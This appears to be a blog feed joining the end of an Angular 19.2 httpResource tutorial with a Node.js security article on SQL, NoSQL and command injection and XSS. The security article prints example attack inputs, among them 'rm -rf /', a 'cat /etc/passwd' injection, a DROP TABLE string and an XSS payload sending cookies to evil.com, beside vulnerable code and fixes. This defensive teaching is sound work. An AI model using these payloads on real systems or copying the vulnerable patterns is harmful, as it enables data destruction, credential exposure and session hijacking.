At its core, the new httpResource currently uses the good old HttpClient. Therefore, the application has to provide this service, which is usually done by calling provideHttpClient during bootstrapping. As a consequence, the httpResource also automatically picks up the registered HttpInterceptors.
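As a minimal sketch, a standalone bootstrap that wires this up could look as follows (authInterceptor is a hypothetical interceptor used only for illustration):

import { bootstrapApplication } from '@angular/platform-browser';
import { provideHttpClient, withInterceptors } from '@angular/common/http';
import { AppComponent } from './app/app.component';
import { authInterceptor } from './app/auth.interceptor';

bootstrapApplication(AppComponent, {
  // httpResource uses HttpClient internally, so registered
  // interceptors apply to its requests as well
  providers: [provideHttpClient(withInterceptors([authInterceptor]))],
});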

However, the HttpClient is just an implementation detail that Angular may eventually replace with a different implementation.

Level files

In our example, the different levels are described by JSON files that define which tiles are to be displayed at which coordinates (Listing 1).

Listing 1:

{
  "levelId": 1,
  "backgroundColor": "#9494ff",
  "items": [
    { "tileKey": "floor", "col": 0, "row": 13, [...] },
    { "tileKey": "cloud", "col": 12, "row": 1, [...] },
    [...]
  ]
}

These coordinates define positions within a matrix of 16×16-pixel blocks. An overview.json file accompanies the level files and lists the names of the available levels.

LevelLoader takes care of loading these files. To do this, it uses the new httpResource (Listing 2).

Listing 2:

@Injectable({ providedIn: 'root' })
export class LevelLoader {
  getLevelOverviewResource(): HttpResourceRef<LevelOverview> {
    return httpResource<LevelOverview>('/levels/overview.json', {
      defaultValue: initLevelOverview,
    });
  }

  getLevelResource(levelKey: () => string | undefined): HttpResourceRef<Level> {
    return httpResource<Level>(() => !levelKey() ? undefined : `/levels/${levelKey()}.json`, {
      defaultValue: initLevel,
    });
  }

 [...]
}

The first parameter passed to httpResource represents the respective URL. The second optional parameter accepts an object with further options. This object allows the definition of a default value that is used before the resource has been loaded.

The getLevelResource method expects a signal with a levelKey, from which the service derives the name of the desired level file. This read-only signal is an abstraction of the type () => string | undefined.

The URL passed from getLevelResource to httpResource is a lambda expression that the resource automatically reevaluates when the levelKey signal changes. In the background, httpResource uses it to create a computed signal that acts as a trigger: every time this trigger changes, the resource loads the URL.

To prevent the httpResource from being triggered, this lambda expression must return the value undefined. This way, the loading can be delayed until the levelKey is available.

Further options with HttpResourceRequest

To get more control over the outgoing HTTP request, the caller can pass an HttpResourceRequest instead of a URL (Listing 3).

Listing 3:

getLevelResource(levelKey: () => string) {
  return httpResource<Level>(
    () => ({
      url: `/levels/${levelKey()}.json`,
      method: "GET",
      headers: {
        accept: "application/json",
      },
      params: {
        levelId: levelKey(),
      },
      reportProgress: false,
      body: null,
      transferCache: false,
      withCredentials: false,
    }),
    { defaultValue: initLevel }
  );
}

This HttpResourceRequest can also be represented by a lambda expression, which the httpResource uses to construct a computed signal internally.

It is important to note that although the httpResource offers the option to specify HTTP methods (HTTP verbs) beyond GET and a body that is transferred as a payload, it is only intended for retrieving data. These options allow you to integrate web APIs that do not adhere to the semantics of HTTP verbs. By default, the httpResource converts the passed body to JSON.
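A hedged sketch of such an integration follows; the /api/level-search endpoint and the searchTerm signal are assumptions made purely for illustration:

searchResource = httpResource<Level[]>(
  () => ({
    url: '/api/level-search',
    method: 'POST',
    body: { term: this.searchTerm() }, // converted to JSON by default
  }),
  { defaultValue: [] }
);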

With the reportProgress option, the caller can request information about the progress of the current operation. This is useful when downloading large files. I will discuss this in more detail below.

Analyzing and validating the received data

By default, the httpResource expects data in the form of JSON that matches the specified type parameter. In addition, a type assertion is used to ensure that TypeScript assumes the presence of correct types. However, it is possible to intervene in this process to provide custom logic for validating the received raw value and converting it to the desired type. To do this, the caller defines a function using the map property in the options object (Listing 4).

Listing 4:

getLevelResourceAlternative(levelKey: () => string) {
  return httpResource<Level>(() => `/levels/${levelKey()}.json`, {
    defaultValue: initLevel,
    map: (raw) => {
      return toLevel(raw);
    },
  });
}

The httpResource converts the received JSON into an object of type unknown and passes it to map. In our example, a simple self-written function toLevel is used. In addition, map also allows the integration of libraries such as Zod, which performs schema validation.
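As a hedged sketch, a Zod-based variant of the loader could look like this; Zod is assumed as an additional dependency, and the schema is a simplified mirror of Listing 1:

import { z } from 'zod';

const LevelSchema = z.object({
  levelId: z.number(),
  backgroundColor: z.string(),
  items: z.array(
    z.object({ tileKey: z.string(), col: z.number(), row: z.number() })
  ),
});

getLevelResourceWithZod(levelKey: () => string) {
  return httpResource<Level>(() => `/levels/${levelKey()}.json`, {
    defaultValue: initLevel,
    // parse() rejects mismatched data before it enters the resource
    map: (raw) => LevelSchema.parse(raw) as Level,
  });
}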

Loading data other than JSON

By default, httpResource expects a JSON document, which it converts into a JavaScript object. However, it also offers other methods that provide other forms of representation:

  • httpResource.text returns text
  • httpResource.blob returns the retrieved data as a blob
  • httpResource.arrayBuffer returns the retrieved data as an ArrayBuffer
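As a minimal sketch, loading a plain-text file could look like this (the URL is made up for illustration):

// Yields an HttpResourceRef<string | undefined>
changelog = httpResource.text({ url: '/CHANGELOG.txt' });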

To demonstrate the use of these possibilities, the example discussed here requests an image with all possible tiles as a blob. From this blob, it derives the tiles required for the selected level style. Figure 3 shows a section of this tilemap and illustrates that the application can switch between the individual styles by choosing a horizontal or vertical offset.

Figure 3: Section of the tilemap used in the example (Source)

A TilesMapLoader delegates to httpResource.blob to load the tilemap (Listing 5).

Listing 5:

@Injectable({ providedIn: "root" })
export class TilesMapLoader {
  getTilesMapResource(): HttpResourceRef<Blob | undefined> {
    return httpResource.blob({
      url: "/tiles.png",
      reportProgress: true,
    });
  }
}

This resource also requests progress information, which the example uses to display the download progress to the left of the drop-down fields.

Putting it all together: reactive flow

The httpResources described in the last sections can now be combined into the reactive graph of the application (Figure 4).

Figure 4: Reactive flow of ngMario

The signals levelKey, style, and animation represent the user input. The first two correspond to the drop-down fields at the top of the application. The animation signal contains a Boolean that indicates whether the animation was started by clicking the Toggle Animation button (see screenshots above).

The tilesResource is a classic resource that derives the individual tiles for the selected style from the tilemap. To do this, it essentially delegates to a function of the game engine, which is treated as a black box here.

The rendering is triggered by an effect, especially since we cannot draw the level directly using data binding. It draws or animates the level on a canvas, which the application retrieves as a signal-based viewChild. Angular then calls the effect whenever the level (provided by the levelResource), the style, the animation flag, or the canvas changes.

The tilesMapProgress signal uses the progress information provided by the tilesMapResource to indicate how much of the tilemap has already been downloaded. To load the list of available levels, the example uses a levelOverviewResource that is not directly connected to the reactive graph discussed so far.

Listing 6 shows the implementation of this reactive flow in the form of fields of the LevelComponent.

Listing 6:

export class LevelComponent implements OnDestroy {
  private tilesMapLoader = inject(TilesMapLoader);
  private levelLoader = inject(LevelLoader);

  canvas = viewChild<ElementRef<HTMLCanvasElement>>("canvas");

  levelKey = linkedSignal<string | undefined>(() => this.getFirstLevelKey());
  style = signal<Style>("overworld");
  animation = signal(false);

  tilesMapResource = this.tilesMapLoader.getTilesMapResource();
  levelResource = this.levelLoader.getLevelResource(this.levelKey);
  levelOverviewResource = this.levelLoader.getLevelOverviewResource();

  tilesResource = createTilesResource(this.tilesMapResource, this.style);

  tilesMapProgress = computed(() =>
    calcProgress(this.tilesMapResource.progress())
  );

  constructor() {
    [...]
    effect(() => {
      this.render();
    });
  }

  reload() {
    this.tilesMapResource.reload();
    this.levelResource.reload();
  }

  private getFirstLevelKey(): string | undefined {
    return this.levelOverviewResource.value()?.levels?.[0]?.levelKey;
  }

  [...]
}

Using a linkedSignal for the levelKey allows us to use the first level as the default value as soon as the list of levels has been loaded. The getFirstLevelKey helper returns this from the levelOverviewResource.

The effect retrieves the named values from the respective signals and passes them to the engine’s animateLevel or renderLevel function (Listing 7).

Listing 7:

private render() {
  const tiles = this.tilesResource.value();
  const level = this.levelResource.value();
  const canvas = this.canvas()?.nativeElement;
  const animation = this.animation();

  if (!tiles || !canvas) {
    return;
  }

  if (animation) {
    animateLevel({
      canvas,
      level,
      tiles,
    });
  } else {
    renderLevel({
      canvas,
      level,
      tiles,
    });
  }
}

Resources and missing parameters

The tilesResource shown in the diagram simply delegates to the asynchronous extractTiles function, which the engine also provides (Listing 8).

Listing 8:

function createTilesResource(
  tilesMapResource: HttpResourceRef<Blob | undefined>,
  style: () => Style
) {
  // Reading the tilesMap inside the computed keeps the request reactive;
  // returning undefined prevents the resource from being triggered
  const request = computed(() => {
    const tilesMap = tilesMapResource.value();
    return !tilesMap
      ? undefined
      : {
          tilesMap,
          style: style(),
        };
  });

  return resource({
    request,
    loader: (params) => {
      const { tilesMap, style } = params.request!;
      return extractTiles(tilesMap, style);
    },
  });
}

This simple resource contains an interesting detail: before the tilemap is loaded, the tilesMapResource has the value undefined. However, we cannot call extractTiles without a tilesMap. The request signal takes this into account: it returns undefined if no tilesMap is available yet, so the resource does not trigger its loader.

Displaying Progress

The tilesMapResource was configured above to provide information about the download progress via its progress signal. A computed signal in the LevelComponent projects it into a string for display (Listing 9).

Listing 9:

function calcProgress(progress: HttpProgressEvent | undefined): string {
  if (!progress) {
    return "-";
  }

  if (progress.total) {
    const percent = Math.round((progress.loaded / progress.total) * 100);
    return percent + "%";
  }

  const kb = Math.round(progress.loaded / 1024);
  return kb + " KB";
}

If the server reports the file size, this function calculates the percentage already downloaded. Otherwise, it returns the number of kilobytes downloaded so far. Before the download starts, no progress information is available, so only a hyphen is displayed.

To test this function, it makes sense to throttle the network connection in the browser’s developer tools and press the reload button in the application to instruct the resources to reload the data.

Status, header, error, and more

In case the application needs the status code or the headers of the HTTP response, the httpResource provides the corresponding signals:

console.log(this.levelOverviewResource.status());
console.log(this.levelOverviewResource.statusCode());
console.log(this.levelOverviewResource.headers()?.keys());

In addition, the httpResource provides everything that is also known from ordinary resources, including an error signal that provides information about any errors that may have occurred, as well as the option to update the value that is available as a local working copy.
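A minimal sketch of both capabilities; the logged message and the patched background color are purely illustrative:

// Inspect a failed request via the error signal
if (this.levelResource.error()) {
  console.error('Level could not be loaded', this.levelResource.error());
}

// Patch the local working copy without an additional HTTP request
this.levelResource.update((level) => ({
  ...level,
  backgroundColor: '#000000',
}));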

Conclusion

The new httpResource is another building block that complements Angular’s new signal story. It allows data to be loaded within the reactive graph. Currently, it uses the HttpClient as an implementation detail, which may be replaced by another solution at a later date.

While the HTTP resource also allows data to be retrieved using HTTP verbs other than GET, it is not designed to write data back to the server. This task still needs to be done in the conventional way.

The post Exploring httpResource in Angular 19.2 appeared first on International JavaScript Conference.

]]>
Common Vulnerabilities in Node.js Web Applications https://javascript-conference.com/blog/node-js-security-vulnerabilities-sql-xss-prevention/ Wed, 23 Apr 2025 07:44:46 +0000 https://javascript-conference.com/?p=107761 As Node.js is widely used to develop scalable and efficient web applications, understanding its vulnerabilities is crucial. In this article, we will explore common security risks, such as SQL injections and XSS attacks, and offer practical strategies to prevent them. By applying these insights, you'll learn how to protect user data and build more secure and reliable applications.

The post Common Vulnerabilities in Node.js Web Applications appeared first on International JavaScript Conference.

]]>
Node.js Overview

Node.js is an open-source, cross-platform server environment that enables server-side JavaScript. First released in 2009, it has grown to be a favorite among developers for building scalable and efficient web applications. Node.js is built on Chrome’s V8 JavaScript engine, which provides high speed and performance.

Another important feature of Node.js is its non-blocking, event-driven architecture. This model lets Node.js handle many concurrent connections, which is why it is widely used in real-time applications such as chat applications, online gaming, and live streaming. Its use of the familiar JavaScript language also eases its adoption.

"Diagram illustrating the Node.js system architecture, showing the interaction between the V8 JavaScript engine, Node.js bindings, the Libuv library, event loop, and asynchronous I/O operations including worker threads for file system, network, and process tasks.

Node.js Architecture

The Node.js architecture is designed to optimize performance and efficiency. It employs an event-driven, non-blocking I/O model to efficiently handle many tasks at a time without being slowed down by I/O operations.

Here are the main components of Node.js architecture:

  • Event Loop: The event loop is the heart of Node.js. It coordinates asynchronous I/O operations and keeps the application responsive. Node.js starts an asynchronous operation, such as a file read or network request, registers a callback function, and then carries on executing other code. Once the operation is complete, the callback is queued up in the event loop, which then calls it.
  • Non-blocking I/O: Node.js uses non-blocking I/O operations so that the application does not become unresponsive while performing time-consuming operations. Instead of blocking the thread and waiting for an operation to finish, Node.js carries on executing other code. This allows Node.js to handle many tasks concurrently.
  • Modules and Packages: Node.js has a large ecosystem of modules and packages that can be loaded into an application easily. The Node Package Manager (NPM) is currently the largest repository of open source software libraries in the world. However, the use of third-party packages also carries risks: if a package contains a vulnerability, an attacker can exploit it.

Why Security is Crucial for Node.js Applications

As the usage of Node.js keeps on increasing, so does the need for strong security measures. The security of Node.js applications is important for several reasons:

  • Protecting Sensitive Data: Web applications often handle sensitive data, including personal information, financial details, and login credentials. This data has to be protected to prevent unauthorized access and data breaches.
  • Maintaining User Trust: Users expect their data and activity on an application to be secure. A security breach can destroy users’ trust and damage the organization’s reputation.
  • Compliance with Regulations: Many industries are strictly regulated with respect to data security and privacy. Node.js applications must comply with these rules to avoid legal consequences and financial penalties.
  • Preventing Financial Loss: Security breaches are costly to organizations. These losses include direct costs, such as fines and legal expenses, and indirect costs, such as lost revenue and damage to the brand.
  • Mitigating Risks from Third-Party Packages: Node.js applications commonly rely on third-party packages, which poses security risks. Attackers can exploit flaws in these packages to take over the application. Updating and scanning these packages regularly is crucial to reduce these risks.

Common Vulnerabilities in Node.js Applications

Injection Attacks – SQL Injection

Overview: An SQL injection is a type of attack where an attacker can execute malicious SQL statements that control a web application’s database server. This is typically done by inserting or “injecting” malicious SQL code into a query.

Scenario 1: Consider a simple login form where a user inputs their username and password. The server-side code might look something like this:

const username = req.body.username;
const password = req.body.password;

const query = `SELECT * FROM users WHERE username = '${username}' AND password = '${password}'`;

db.query(query, (err, result) => {
  if (err) throw err;
  // Process result
});

If an attacker inputs admin' -- as the username and leaves the password blank, the query becomes:

SELECT * FROM users WHERE username = 'admin' --' AND password = ''

The -- sequence comments out the rest of the query, allowing the attacker to bypass authentication.

Solution: To prevent SQL injection, use parameterized queries or prepared statements. This ensures that user input is treated as data, not executable code.

const username = req.body.username;
const password = req.body.password;

const query = 'SELECT * FROM users WHERE username = ? AND password = ?';

db.query(query, [username, password], (err, result) => {
  if (err) throw err;
  // Process result
});

Scenario 2: Consider a simple Express application that retrieves a user from a database:

const express = require('express');
const mysql = require('mysql');

const app = express();

// Database connection
const connection = mysql.createConnection({
  host: 'localhost',
  user: 'root',
  password: 'password',
  database: 'users_db'
});

app.get('/user', (req, res) => {
  const userId = req.query.id;

  // VULNERABLE CODE: Direct concatenation of user input
  const query = "SELECT * FROM users WHERE id = " + userId;

  connection.query(query, (err, results) => {
    if (err) throw err;
    res.json(results);
  });
});

app.listen(3000);

The Attack

An attacker can exploit this by making a request like:

GET /user?id=1 OR 1=1

The resulting query becomes:

SELECT * FROM users WHERE id = 1 OR 1=1

Since 1=1 is always true, this returns ALL users in the database, exposing sensitive information.

More dangerous attacks might include:

GET /user?id=1; DROP TABLE users; --

This attempts to delete the entire users table.

Secure Solution

Here’s how to fix the vulnerability using parameterized queries:

app.get('/user', (req, res) => {
  const userId = req.query.id;

  // SECURE CODE: Using parameterized queries
  const query = "SELECT * FROM users WHERE id = ?";

  connection.query(query, [userId], (err, results) => {
    if (err) throw err;
    res.json(results);
  });
});

Best Practices to Prevent SQL Injection

  1. Use Parameterized Queries: Always use parameter placeholders (?) and pass values separately.
  2. ORM Libraries: Consider using ORM libraries like Sequelize or Prisma that handle parameterization automatically (see the sketch after this list).
  3. Input Validation: Validate user input (type, format, length) before using it in queries.
  4. Principle of Least Privilege: Database users should have minimal permissions needed for the application.
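To illustrate point 2, here is a hedged sketch using Prisma; it assumes a User model in the Prisma schema, and the client parameterizes all values automatically:

const { PrismaClient } = require('@prisma/client');

const prisma = new PrismaClient();

async function findUser(username, password) {
  // Values are passed as query parameters, never concatenated into SQL
  return prisma.user.findFirst({
    where: { username, password },
  });
}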

NoSQL Injection

Overview: NoSQL injection is similar to SQL injection but targets NoSQL databases like MongoDB. Attackers can manipulate queries to execute arbitrary commands.

Scenario 1: Consider a MongoDB query to find a user by username and password:

const username = req.body.username;
const password = req.body.password;

User.findOne({ username: username, password: password }, (err, user) => {
  if (err) throw err;
  // Process user
});

The Attack

If an attacker inputs { “$ne”: “” } as the password, the query becomes:

User.findOne({ username: 'admin', password: { "$ne": "" } }, (err, user) => {
  if (err) throw err;
  // Process user
});

This query returns the first user where the password is not empty, potentially bypassing authentication.

Solution: To prevent NoSQL injection, sanitize user inputs and use libraries like mongo-sanitize to remove any characters that could be used in an injection attack.

const sanitize = require('mongo-sanitize');

const username = sanitize(req.body.username);
const password = sanitize(req.body.password);

User.findOne({ username: username, password: password }, (err, user) => {
  if (err) throw err;
  // Process user
});

Scenario 2: Consider a Node.js application that allows users to search for products with filtering options:

app.post('/products/search', async (req, res) => {
  const { category, sortField } = req.body;

  // VULNERABLE CODE: Directly using user input in aggregation pipeline
  const pipeline = [
    { $match: { category: category } },
    { $sort: { [sortField]: 1 } }, // Dangerous!
    { $limit: 20 }
  ];

  try {
    const products = await productsCollection.aggregate(pipeline).toArray();
    res.json(products);
  } catch (err) {
    res.status(500).json({ error: err.message });
  }
});

The Attack

An attacker could send a malicious payload:

{
  "category": "electronics",
  "sortField": "$function: { body: function() { return db.getSiblingDB('admin').auth('admin', 'password') } }"
}

This attempts to execute arbitrary JavaScript in the MongoDB server through the $function operator, potentially allowing database access control bypass or even server-side JavaScript execution.

Secure Solution

Here’s the fixed version:

app.post('/products/search', async (req, res) => {
  const { category, sortField } = req.body;

  // Validate category
  if (typeof category !== 'string') {
    return res.status(400).json({ error: "Invalid category format" });
  }

  // Validate sort field against allowlist
  const allowedSortFields = ['name', 'price', 'rating', 'date_added'];
  if (!allowedSortFields.includes(sortField)) {
    return res.status(400).json({ error: "Invalid sort field" });
  }

  // SECURE CODE: Using validated input
  const pipeline = [
    { $match: { category: category } },
    { $sort: { [sortField]: 1 } },
    { $limit: 20 }
  ];

  try {
    const products = await productsCollection.aggregate(pipeline).toArray();
    res.json(products);
  } catch (err) {
    res.status(500).json({ error: "An error occurred" });
  }
});

Key Takeaways:

  1. Validates the data type of the category parameter.
  2. Uses an allowlist approach for sortField, restricting possible values.
  3. Avoids exposing detailed error information to potential attackers.

Command Injection

Overview: Command injection occurs when an attacker can execute arbitrary commands on the host operating system via a vulnerable application. This typically happens when user input is passed directly to a system shell.

Example: Consider a Node.js application that uses the exec function to list files in a directory:

const { exec } = require('child_process');

const dir = req.body.dir;

exec(`ls ${dir}`, (err, stdout, stderr) => {
  if (err) throw err;
  // Process stdout
});

If an attacker inputs ; rm -rf /, the command becomes:

ls ; rm -rf /

This command lists the directory contents and then deletes the root directory, causing significant damage.

Solution: To prevent command injection, avoid using exec with unsanitized user input. Use safer alternatives like execFile or spawn, which do not invoke a shell.

const { execFile } = require('child_process');

const dir = req.body.dir;

execFile('ls', [dir], (err, stdout, stderr) => {
  if (err) throw err;
  // Process stdout
});

Scenario 2: Consider a Node.js application that allows users to ping a host to check connectivity:

const express = require('express');
const { exec } = require('child_process');

const app = express();
app.use(express.urlencoded({ extended: true }));

app.get('/ping', (req, res) => {
  const hostInput = req.query.host;

  // VULNERABLE CODE: Direct concatenation of user input into command
  const command = 'ping -c 4 ' + hostInput;

  exec(command, (error, stdout, stderr) => {
    if (error) {
      res.status(500).send(`Error: ${stderr}`);
      return;
    }
    res.send(`<pre>${stdout}</pre>`);
  });
});

app.listen(3000);

The Attack

An attacker could exploit this vulnerability by providing a malicious input:

/ping?host=google.com; cat /etc/passwd

The resulting command becomes:

ping -c 4 google.com; cat /etc/passwd

This would execute the ping command followed by displaying the contents of the system’s password file, potentially exposing sensitive information.

An even more destructive payload is:

/ping?host=;rm -rf /*

This attempts to delete all files on the system (assuming sufficient permissions).

Secure Solution

Here’s how to fix the vulnerability:

const express = require('express');
const { execFile } = require('child_process');

const app = express();
app.use(express.urlencoded({ extended: true }));

app.get('/ping', (req, res) => {
  const hostInput = req.query.host;

  // Input validation: Basic hostname format check
  if (!/^[a-zA-Z0-9][a-zA-Z0-9\.-]+$/.test(hostInput)) {
    return res.status(400).send('Invalid hostname format');
  }

  // SECURE CODE: Using execFile which doesn't invoke a shell
  execFile('ping', ['-c', '4', hostInput], (error, stdout, stderr) => {
    if (error) {
      res.status(500).send('Error executing command');
      return;
    }
    res.send(`<pre>${stdout}</pre>`);
  });
});

app.listen(3000);

Best Practices to Prevent Command Injection

  1. Avoid shell execution: Use execFile or spawn instead of exec when possible, as they don’t invoke a shell.
  2. Input validation: Implement strict validation of user input using regex or other validation methods.
  3. Allowlists: Use allowlists to restrict inputs to known-good values.
  4. Use built-in APIs: When possible, use Node.js built-in modules instead of executing system commands (see the sketch after this list).
  5. Principle of least privilege: Run your Node.js application with minimal required system permissions.
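As a sketch of point 4, a directory listing can use the fs API instead of shelling out to ls; BASE_DIR is a hypothetical allowlisted root chosen for illustration:

const { readdir } = require('node:fs/promises');
const path = require('node:path');

const BASE_DIR = '/srv/app/data';

async function listDirectory(userInput) {
  const resolved = path.resolve(BASE_DIR, userInput);

  // Reject anything that resolves outside the allowlisted root
  if (!resolved.startsWith(BASE_DIR + path.sep)) {
    throw new Error('Invalid directory');
  }

  return readdir(resolved);
}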

Cross-Site Scripting (XSS) Attacks

Cross-site scripting (XSS) is one of the most common security vulnerabilities in web applications. It allows attackers to inject malicious scripts into web pages that other users view. These scripts then execute in the context of the victim’s browser, enabling data theft, session hijacking, and other malicious activities. An XSS vulnerability occurs when an application uses unvalidated input when building a web page.

How XSS Occurs

XSS attacks happen when an attacker is able to inject malicious scripts into a web application and those scripts are executed in the victim’s browser, allowing the attacker to perform actions on behalf of the user or steal sensitive information.

How XSS Occurs in Node.js

XSS attacks can occur in Node.js applications when user input is not properly sanitized or encoded before being included in the HTML output. This can happen in various scenarios, such as displaying user comments, search results, or any other dynamic content.

Types of XSS Attacks

XSS vulnerabilities can be classified into three primary types:

  • Reflected XSS: The malicious script is reflected off a web server, such as in an error message or search result, and is immediately executed by the user’s browser.
  • Stored XSS: The malicious script is stored on the server, such as in a database, and is executed whenever the data is retrieved and displayed to users.
  • DOM-Based XSS: The vulnerability exists in the client-side code rather than the server-side code, and the malicious script is executed as a result of modifying the DOM environment.

Scenario 1: Consider a Node.js application that displays user comments without proper sanitization:

const express = require('express');

const app = express();
app.use(express.urlencoded({ extended: true }));

app.post('/comment', (req, res) => {
  const comment = req.body.comment;
  res.send(`<div><p>User comment: ${comment}</p></div>`);
});

app.listen(3000, () => {
  console.log('Server is running on port 3000');
});

If an attacker submits a comment containing a malicious script, such as:

<script>alert('XSS');</script>

The application will render the comment as:

<div>
  <p>User comment: <script>alert('XSS');</script></p>
</div>

When another user views the comment, the script will execute, displaying an alert box with the message “XSS”.

Prevention Techniques

To prevent XSS attacks in Node.js applications, developers should implement the following techniques:

  • Input Validation: Ensure that all user inputs are validated to conform to expected formats. Reject any input that contains potentially malicious content.
  • Output Encoding: Encode user inputs before displaying them in the browser. This ensures that any special characters are treated as text rather than executable code.
const express = require('express');
const escapeHtml = require('escape-html');

const app = express();
app.use(express.urlencoded({ extended: true }));

app.post('/comment', (req, res) => {
  const comment = escapeHtml(req.body.comment);
  res.send(`<div><p>User comment: ${comment}</p></div>`);
});

app.listen(3000, () => {
  console.log('Server is running on port 3000');
});

Here, escapeHtml is a function that converts special characters to their HTML entity equivalents.

  • Content Security Policy (CSP): Implement a Content Security Policy to restrict the sources from which scripts can be loaded. This helps prevent the execution of malicious scripts.
  • HTTP-Only and Secure Cookies: Use HTTP-only and secure flags for cookies to prevent them from being accessed by malicious scripts.
res.cookie('session', sessionId, { httpOnly: true, secure: true });

Scenario 2: Reflected XSS in a Search Feature

Here’s a simple Express application with an XSS vulnerability:

const express = require('express');

const app = express();

app.get('/search', (req, res) => {
  const searchTerm = req.query.q;

  // VULNERABLE CODE: Directly embedding user input in HTML response
  res.send(`
    <h1>Search Results for: ${searchTerm}</h1>
    <p>No results found.</p>
    <a href="/">Back to home</a>
  `);
});

app.listen(3000);

The Attack

An attacker could craft a malicious URL:

/search?q=<script>document.location='https://evil.com/stealinfo.php?cookie='+document.cookie</script>

When a victim visits this URL, the script executes in their browser, sending their cookies to the attacker’s server. This could lead to session hijacking and account takeover.

Secure Solutions

  1. Output Encoding
const express = require('express');

const app = express();

app.get('/search', (req, res) => {
  const searchTerm = req.query.q || '';

  // SECURE CODE: Encoding special characters
  const encodedTerm = searchTerm
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');

  res.send(`
    <h1>Search Results for: ${encodedTerm}</h1>
    <p>No results found.</p>
    <a href="/">Back to home</a>
  `);
});

2. Using Template Engines

const express = require('express');

const app = express();

app.set('view engine', 'ejs');
app.set('views', './views');

app.get('/search', (req, res) => {
  const searchTerm = req.query.q || '';

  // SECURE CODE: Using EJS template engine with automatic escaping
  res.render('search', { searchTerm });
});

3. Using Content Security Policy

const express = require('express');
const helmet = require('helmet');

const app = express();

// Add Content Security Policy headers
app.use(helmet.contentSecurityPolicy({
  directives: {
    defaultSrc: ["'self'"],
    scriptSrc: ["'self'"],
    styleSrc: ["'self'"],
  }
}));

app.get('/search', (req, res) => {
  // Even with encoding, adding CSP provides defense in depth
  const searchTerm = req.query.q || '';
  const encodedTerm = searchTerm
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');

  res.send(`
    <h1>Search Results for: ${encodedTerm}</h1>
    <p>No results found.</p>
    <a href="/">Back to home</a>
  `);
});

Best Practices to Prevent XSS

  • Context-appropriate encoding: Encode output according to the context in which it will be used: HTML, JavaScript, CSS, or URL.
  • Use security libraries: When rendering user-supplied HTML, sanitize it with libraries such as DOMPurify, js-xss, or sanitize-html (see the sketch after this list).
  • Content Security Policy: Use CSP headers to restrict where scripts can be loaded from and whether they can execute.
  • Use modern frameworks: Frameworks like React, Vue, and Angular escape output by default.
  • X-XSS-Protection: This header enables the browser’s built-in XSS filters; note that it is deprecated in modern browsers and should only be treated as a legacy measure.
  • HttpOnly cookies: Designate sensitive cookies as HttpOnly to prevent them from being accessed by JavaScript.
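As a hedged sketch of the library approach, server-side sanitization with DOMPurify and jsdom (both assumed as dependencies) could look like this:

const createDOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');

const { window } = new JSDOM('');
const DOMPurify = createDOMPurify(window);

const dirty = '<img src=x onerror=alert(1)//>';
const clean = DOMPurify.sanitize(dirty);
// clean is now: <img src="x">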

Following these practices will go a long way in ensuring that your Node.js applications are secure against XSS attacks, which are still very frequent in web applications.

Conclusion

Security requires a comprehensive approach addressing all potential vulnerabilities. We discussed two of the most common threats that affect web applications:

SQL Injection

We explained how unsanitized user input in database queries can result in unauthorized data access or manipulation. To protect your applications:

  • Instead of string concatenation, use parameterized queries.
  • Alternatively, use an ORM that handles parameterization for you.
  • Validate all user inputs before processing.
  • Apply the principle of least privilege for database access.

Cross-Site Scripting (XSS)

We looked at how reflected XSS in a search feature can allow attackers to inject malicious scripts that are executed in users’ browsers. Essential defensive measures include:

  • Encoding of output where appropriate
  • Security libraries for HTML sanitization
  • Content Security Policy headers
  • Frameworks that offer protection against XSS
  • HttpOnly cookies for sensitive data

The post Common Vulnerabilities in Node.js Web Applications appeared first on International JavaScript Conference.

]]>